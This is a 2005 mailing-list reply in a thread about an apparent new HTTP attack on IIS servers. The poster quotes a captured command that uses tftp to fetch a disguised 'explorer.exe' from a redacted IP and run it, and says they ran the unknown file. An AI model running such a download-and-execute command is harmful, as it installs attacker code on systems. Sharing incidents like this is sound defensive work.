Security Incidents mailing list archives
Re: Re: New http attack?
From: phil () ramtronik com
Date: 19 Jun 2005 22:14:59 -0000
Hello, saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication, further down from the 'QUFB' repetition was an embedded string: cmd /c tftp -i x.x.x.x GET explorer.exe start explorer.exe exit have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to symantec, as my virus checker didnt flag it. incidentally, i ran the file, and it wasn't explorer, though i dont know what it is. Phil
Current thread:
- New http attack? Keith T. Morgan (Jun 08)
- Re: New http attack? dullien (Jun 08)
- Re: New http attack? Kirby Angell (Jun 08)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Alex (Jun 10)
- Re: New http attack? Ron (Jun 10)
- Re: New http attack? Kevin Timm (Jun 10)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Tomaz Solc (Jun 08)
- <Possible follow-ups>
- Re: New http attack? Jason Falciola (Jun 08)
- Re: Re: New http attack? phil (Jun 20)
- Re: Re: New http attack? phil (Jun 20)